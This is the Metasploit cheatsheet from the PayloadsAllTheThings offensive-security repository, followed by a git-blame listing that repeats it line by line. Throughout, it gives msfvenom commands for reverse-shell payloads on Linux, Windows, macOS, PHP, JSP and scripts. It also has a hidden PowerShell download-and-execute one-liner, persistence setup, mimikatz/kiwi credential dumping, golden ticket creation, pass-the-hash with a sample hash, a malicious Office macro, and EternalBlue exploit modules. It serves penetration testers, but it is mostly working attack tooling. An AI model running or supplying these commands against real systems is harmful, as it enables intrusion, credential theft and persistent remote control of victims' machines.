PayloadsAllTheThings/Methodology and Resources/Metasploit - Cheatsheet.md

# Metasploit

## Summary

* [Installation](#installation)
* [Sessions](#sessions)
* [Background handler](#background-handler)
* [Meterpreter - Basic](#meterpreter---basic)
    * [Generate a meterpreter](#generate-a-meterpreter)
    * [Meterpreter Webdelivery](#meterpreter-webdelivery)
    * [Get System](#get-system)
    * [Persistence Startup](#persistence-startup)
    * [Network Monitoring](#network-monitoring)
    * [Portforward](#portforward)
    * [Upload / Download](#upload---download)
    * [Execute from Memory](#execute-from-memory)
    * [Mimikatz](#mimikatz)
    * [Pass the Hash - PSExec](#pass-the-hash---psexec)
    * [Use SOCKS Proxy](#use-socks-proxy)
* [Scripting Metasploit](#scripting-metasploit)
* [Multiple transports](#multiple-transports)
* [Best of - Exploits](#best-of---exploits)
* [References](#references)

## Installation

```powershell
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
```

or docker

```powershell
sudo docker run --rm -it -p 443:443 -v ~/.msf4:/root/.msf4 -v /tmp/msf:/tmp/data remnux/metasploit
```

## Sessions

```powershell
CTRL+Z   -> Session in Background
sessions -> List sessions
sessions -i session_number -> Interact with Session with id
sessions -u session_number -> Upgrade session to a meterpreter
sessions -u session_number LPORT=4444 PAYLOAD_OVERRIDE=meterpreter/reverse_tcp HANDLER=false-> Upgrade session to a meterpreter

sessions -c cmd           -> Execute a command on several sessions
sessions -i 10-20 -c "id" -> Execute a command on several sessions
```

## Background handler

ExitOnSession : the handler will not exit if the meterpreter dies.

```powershell
screen -dRR
sudo msfconsole

use exploit/multi/handler
set PAYLOAD generic/shell_reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
set ExitOnSession false

generate -o /tmp/meterpreter.exe -f exe
to_handler

[ctrl+a] + [d]
```

## Meterpreter - Basic

### Generate a meterpreter

```powershell
$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f elf > shell.elf
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f exe > shell.exe
$ msfvenom -p osx/x86/shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f macho > shell.macho
$ msfvenom -p php/meterpreter_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f raw > shell.php; cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f asp > shell.asp
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f raw > shell.jsp
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f war > shell.war
$ msfvenom -p cmd/unix/reverse_python LHOST="10.10.10.110" LPORT=4242 -f raw > shell.py
$ msfvenom -p cmd/unix/reverse_bash LHOST="10.10.10.110" LPORT=4242 -f raw > shell.sh
$ msfvenom -p cmd/unix/reverse_perl LHOST="10.10.10.110" LPORT=4242 -f raw > shell.pl
```

### Meterpreter Webdelivery

Set up a Powershell web delivery listening on port 8080.

```powershell
use exploit/multi/script/web_delivery
set TARGET 2
set payload windows/x64/meterpreter/reverse_http
set LHOST 10.0.0.1
set LPORT 4444
run
```

```powershell
powershell.exe -nop -w hidden -c $g=new-object net.webclient;$g.proxy=[Net.WebRequest]::GetSystemWebProxy();$g.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $g.downloadstring('http://10.0.0.1:8080/rYDPPB');
```


### Get System

```powershell
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

### Persistence Startup

```powershell
OPTIONS:

-A        Automatically start a matching exploit/multi/handler to connect to the agent
-L <opt>  Location in target host to write payload to, if none %TEMP% will be used.
-P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.
-S        Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt>  Alternate executable template to use
-U        Automatically start the agent when the User logs on
-X        Automatically start the agent when the system boots
-h        This help menu
-i <opt>  The interval in seconds between each connection attempt
-p <opt>  The port on which the system running Metasploit is listening
-r <opt>  The IP of the system running Metasploit listening for the connect back

meterpreter > run persistence -U -p 4242
```

### Network Monitoring

```powershell
# list interfaces
run packetrecorder -li

# record interface n°1
run packetrecorder -i 1
```

### Portforward

```powershell
portfwd add -l 7777 -r 172.17.0.2 -p 3006
```

### Upload / Download

```powershell
upload /path/in/hdd/payload.exe exploit.exe
download /path/in/victim
```

### Execute from Memory

```powershell
execute -H -i -c -m -d calc.exe -f /root/wce.exe -a  -w
```

### Mimikatz

```powershell
load mimikatz
mimikatz_command -f version
mimikatz_command -f samdump::hashes
mimikatz_command -f sekurlsa::wdigest
mimikatz_command -f sekurlsa::searchPasswords
mimikatz_command -f sekurlsa::logonPasswords full
```

```powershell
load kiwi
creds_all
golden_ticket_create -d <domainname> -k <nthashof krbtgt> -s <SID without le RID> -u <user_for_the_ticket> -t <location_to_store_tck>
```

### Pass the Hash - PSExec

```powershell
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) > exploit
SMBDomain             WORKGROUP                                                          no        The Windows domain to use for authentication
SMBPass               598ddce2660d3193aad3b435b51404ee:2d20d252a479f485cdf5e171d93985bf  no        The password for the specified username
SMBUser               Lambda                                                             no        The username to authenticate as
```

### Use SOCKS Proxy

```powershell
setg Proxies socks4:127.0.0.1:1080
```

## Scripting Metasploit

Using a `.rc file`, write the commands to execute, then run `msfconsole -r ./file.rc`.
Here is a simple example to script the deployment of a handler an create an Office doc with macro.

```powershell
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 0.0.0.0
set LPORT 4646
set ExitOnSession false
exploit -j -z


use exploit/multi/fileformat/office_word_macro 
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 10.10.14.22
set LPORT 4646
exploit
```

## Multiple transports

```powershell
msfvenom -p windows/meterpreter_reverse_tcp lhost=<host> lport=<port> sessionretrytotal=30 sessionretrywait=10 extensions=stdapi,priv,powershell extinit=powershell,/home/ionize/AddTransports.ps1 -f exe
```

Then, in AddTransports.ps1

```powershell
Add-TcpTransport -lhost <host> -lport <port> -RetryWait 10 -RetryTotal 30
Add-WebTransport -Url http(s)://<host>:<port>/<luri> -RetryWait 10 -RetryTotal 30
```

## Best of - Exploits

* MS17-10 Eternal Blue - `exploit/windows/smb/ms17_010_eternalblue`
* MS08_67 - `exploit/windows/smb/ms08_067_netapi`

## References

* [Multiple transports in a meterpreter payload - ionize](https://ionize.com.au/multiple-transports-in-a-meterpreter-payload/)
* [Creating Metasploit Payloads - Peleus](https://netsec.ws/?p=331)
Metasploit Cheatsheet 2018-11-24 14:32:44 +00:00			`# Metasploit`

XSS injection Summary + MSF web delivery 2019-05-12 12:22:48 +00:00			`## Summary`

			`* [Installation](#installation)`
			`* [Sessions](#sessions)`
			`* [Background handler](#background-handler)`
			`* [Meterpreter - Basic](#meterpreter---basic)`
			`* [Generate a meterpreter](#generate-a-meterpreter)`
			`* [Meterpreter Webdelivery](#meterpreter-webdelivery)`
			`* [Get System](#get-system)`
			`* [Persistence Startup](#persistence-startup)`
Network Discovery - Masscan update 2019-08-28 23:08:26 +00:00			`* [Network Monitoring](#network-monitoring)`
XSS injection Summary + MSF web delivery 2019-05-12 12:22:48 +00:00			`* [Portforward](#portforward)`
			`* [Upload / Download](#upload---download)`
			`* [Execute from Memory](#execute-from-memory)`
			`* [Mimikatz](#mimikatz)`
			`* [Pass the Hash - PSExec](#pass-the-hash---psexec)`
Sticky Notes Windows + Cobalt SMB 2020-10-16 09:35:15 +00:00			`* [Use SOCKS Proxy](#use-socks-proxy)`
XSS injection Summary + MSF web delivery 2019-05-12 12:22:48 +00:00			`* [Scripting Metasploit](#scripting-metasploit)`
			`* [Multiple transports](#multiple-transports)`
			`* [Best of - Exploits](#best-of---exploits)`
			`* [References](#references)`

Metasploit Cheatsheet 2018-11-24 14:32:44 +00:00			`## Installation`

			```powershell
			`curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall`
			```

			`or docker`

			```powershell
			`sudo docker run --rm -it -p 443:443 -v ~/.msf4:/root/.msf4 -v /tmp/msf:/tmp/data remnux/metasploit`
			```

			`## Sessions`

			```powershell
			`CTRL+Z -> Session in Background`
			`sessions -> List sessions`
			`sessions -i session_number -> Interact with Session with id`
			`sessions -u session_number -> Upgrade session to a meterpreter`
			`sessions -u session_number LPORT=4444 PAYLOAD_OVERRIDE=meterpreter/reverse_tcp HANDLER=false-> Upgrade session to a meterpreter`

			`sessions -c cmd -> Execute a command on several sessions`
			`sessions -i 10-20 -c "id" -> Execute a command on several sessions`
			```

XSS injection Summary + MSF web delivery 2019-05-12 12:22:48 +00:00			`## Background handler`
Metasploit Cheatsheet 2018-11-24 14:32:44 +00:00
			`ExitOnSession : the handler will not exit if the meterpreter dies.`

			```powershell
			`screen -dRR`
			`sudo msfconsole`

			`use exploit/multi/handler`
			`set PAYLOAD generic/shell_reverse_tcp`
			`set LHOST 0.0.0.0`
			`set LPORT 4444`
			`set ExitOnSession false`
Meterpreter shell 2019-06-09 12:26:14 +00:00
			`generate -o /tmp/meterpreter.exe -f exe`
			`to_handler`
Metasploit Cheatsheet 2018-11-24 14:32:44 +00:00
			`[ctrl+a] + [d]`
			```

			`## Meterpreter - Basic`

Meterpreter generate + LaTeK XSS + Ruby Yaml 2019-03-03 15:31:17 +00:00			`### Generate a meterpreter`

			```powershell
			`$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f elf > shell.elf`
			`$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f exe > shell.exe`
			`$ msfvenom -p osx/x86/shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f macho > shell.macho`
			`$ msfvenom -p php/meterpreter_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f raw > shell.php; cat shell.php \| pbcopy && echo '<?php ' \| tr -d '\n' > shell.php && pbpaste >> shell.php`
			`$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f asp > shell.asp`
			`$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f raw > shell.jsp`
			`$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f war > shell.war`
			`$ msfvenom -p cmd/unix/reverse_python LHOST="10.10.10.110" LPORT=4242 -f raw > shell.py`
			`$ msfvenom -p cmd/unix/reverse_bash LHOST="10.10.10.110" LPORT=4242 -f raw > shell.sh`
			`$ msfvenom -p cmd/unix/reverse_perl LHOST="10.10.10.110" LPORT=4242 -f raw > shell.pl`
			```

XSS injection Summary + MSF web delivery 2019-05-12 12:22:48 +00:00			`### Meterpreter Webdelivery`

			`Set up a Powershell web delivery listening on port 8080.`

			```powershell
			`use exploit/multi/script/web_delivery`
			`set TARGET 2`
			`set payload windows/x64/meterpreter/reverse_http`
			`set LHOST 10.0.0.1`
			`set LPORT 4444`
			`run`
			```

			```powershell
			`powershell.exe -nop -w hidden -c $g=new-object net.webclient;$g.proxy=[Net.WebRequest]::GetSystemWebProxy();$g.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $g.downloadstring('http://10.0.0.1:8080/rYDPPB');`
			```


			`### Get System`
Metasploit Cheatsheet 2018-11-24 14:32:44 +00:00
			```powershell
			`meterpreter > getsystem`
			`...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).`

			`meterpreter > getuid`
			`Server username: NT AUTHORITY\SYSTEM`
			```

			`### Persistence Startup`

			```powershell
			`OPTIONS:`

			`-A Automatically start a matching exploit/multi/handler to connect to the agent`
			`-L <opt> Location in target host to write payload to, if none %TEMP% will be used.`
			`-P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.`
			`-S Automatically start the agent on boot as a service (with SYSTEM privileges)`
			`-T <opt> Alternate executable template to use`
			`-U Automatically start the agent when the User logs on`
			`-X Automatically start the agent when the system boots`
			`-h This help menu`
			`-i <opt> The interval in seconds between each connection attempt`
			`-p <opt> The port on which the system running Metasploit is listening`
			`-r <opt> The IP of the system running Metasploit listening for the connect back`

			`meterpreter > run persistence -U -p 4242`
			```

Network Discovery - Masscan update 2019-08-28 23:08:26 +00:00			`### Network Monitoring`

			```powershell
			`# list interfaces`
			`run packetrecorder -li`

			`# record interface n°1`
			`run packetrecorder -i 1`
			```

Metasploit Cheatsheet 2018-11-24 14:32:44 +00:00			`### Portforward`

			```powershell
			`portfwd add -l 7777 -r 172.17.0.2 -p 3006`
			```

			`### Upload / Download`

			```powershell
			`upload /path/in/hdd/payload.exe exploit.exe`
			`download /path/in/victim`
			```

			`### Execute from Memory`

			```powershell
			`execute -H -i -c -m -d calc.exe -f /root/wce.exe -a -w`
			```

			`### Mimikatz`

			```powershell
			`load mimikatz`
			`mimikatz_command -f version`
			`mimikatz_command -f samdump::hashes`
SQL informationschema.processlist + UPNP warning + getcap -ep 2019-05-25 16:19:08 +00:00			`mimikatz_command -f sekurlsa::wdigest`
Metasploit Cheatsheet 2018-11-24 14:32:44 +00:00			`mimikatz_command -f sekurlsa::searchPasswords`
SQL informationschema.processlist + UPNP warning + getcap -ep 2019-05-25 16:19:08 +00:00			`mimikatz_command -f sekurlsa::logonPasswords full`
Metasploit Cheatsheet 2018-11-24 14:32:44 +00:00			```

			```powershell
			`load kiwi`
XSS injection Summary + MSF web delivery 2019-05-12 12:22:48 +00:00			`creds_all`
Metasploit Cheatsheet 2018-11-24 14:32:44 +00:00			`golden_ticket_create -d <domainname> -k <nthashof krbtgt> -s <SID without le RID> -u <user_for_the_ticket> -t <location_to_store_tck>`
			```

			`### Pass the Hash - PSExec`

			```powershell
			`msf > use exploit/windows/smb/psexec`
			`msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp`
			`msf exploit(psexec) > exploit`
			`SMBDomain WORKGROUP no The Windows domain to use for authentication`
			`SMBPass 598ddce2660d3193aad3b435b51404ee:2d20d252a479f485cdf5e171d93985bf no The password for the specified username`
			`SMBUser Lambda no The username to authenticate as`
			```

Sticky Notes Windows + Cobalt SMB 2020-10-16 09:35:15 +00:00			`### Use SOCKS Proxy`

			```powershell
			`setg Proxies socks4:127.0.0.1:1080`
			```

Metasploit Cheatsheet 2018-11-24 14:32:44 +00:00			`## Scripting Metasploit`

			Using a `.rc file`, write the commands to execute, then run `msfconsole -r ./file.rc`.
			`Here is a simple example to script the deployment of a handler an create an Office doc with macro.`

			```powershell
			`use exploit/multi/handler`
			`set PAYLOAD windows/meterpreter/reverse_https`
			`set LHOST 0.0.0.0`
			`set LPORT 4646`
			`set ExitOnSession false`
			`exploit -j -z`


			`use exploit/multi/fileformat/office_word_macro`
			`set PAYLOAD windows/meterpreter/reverse_https`
SQLmap tamper update 2019-02-10 18:07:27 +00:00			`set LHOST 10.10.14.22`
Metasploit Cheatsheet 2018-11-24 14:32:44 +00:00			`set LPORT 4646`
			`exploit`
			```

			`## Multiple transports`

			```powershell
			`msfvenom -p windows/meterpreter_reverse_tcp lhost=<host> lport=<port> sessionretrytotal=30 sessionretrywait=10 extensions=stdapi,priv,powershell extinit=powershell,/home/ionize/AddTransports.ps1 -f exe`
			```

			`Then, in AddTransports.ps1`

			```powershell
			`Add-TcpTransport -lhost <host> -lport <port> -RetryWait 10 -RetryTotal 30`
			`Add-WebTransport -Url http(s)://<host>:<port>/<luri> -RetryWait 10 -RetryTotal 30`
			```

			`## Best of - Exploits`

			* MS17-10 Eternal Blue - `exploit/windows/smb/ms17_010_eternalblue`
			* MS08_67 - `exploit/windows/smb/ms08_067_netapi`

Adding references sectio 2018-12-24 14:02:50 +00:00			`## References`
Metasploit Cheatsheet 2018-11-24 14:32:44 +00:00
			`* [Multiple transports in a meterpreter payload - ionize](https://ionize.com.au/multiple-transports-in-a-meterpreter-payload/)`
Meterpreter generate + LaTeK XSS + Ruby Yaml 2019-03-03 15:31:17 +00:00			`* [Creating Metasploit Payloads - Peleus](https://netsec.ws/?p=331)`